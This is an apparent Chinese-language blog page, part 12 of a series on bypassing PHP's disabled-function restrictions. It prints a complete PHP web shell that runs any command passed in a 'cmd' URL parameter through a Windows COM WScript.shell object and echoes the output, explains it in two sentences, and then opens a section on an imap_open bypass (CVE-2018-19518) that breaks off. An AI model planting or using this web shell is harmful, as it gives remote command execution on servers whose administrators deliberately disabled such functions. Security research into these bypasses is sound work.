主页 > 网络知识 > php中函数禁用绕过的原理与利用(12)

php中函数禁用绕过的原理与利用(12)

要知道原理还是直接从exp看起:

<?php $command = $_GET['cmd']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>

首先,以new COM('WScript.shell')来生成一个com对象,里面的参数也可以为Shell.Application(笔者的win10下测试失败)。

然后这个com对象中存在着exec可以用来执行命令,而后续的方法则是将命令输出,该方式的利用还是较为简单的,就不多讲了。

imap_open

该bypass方式为CVE-2018-19518

原理
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!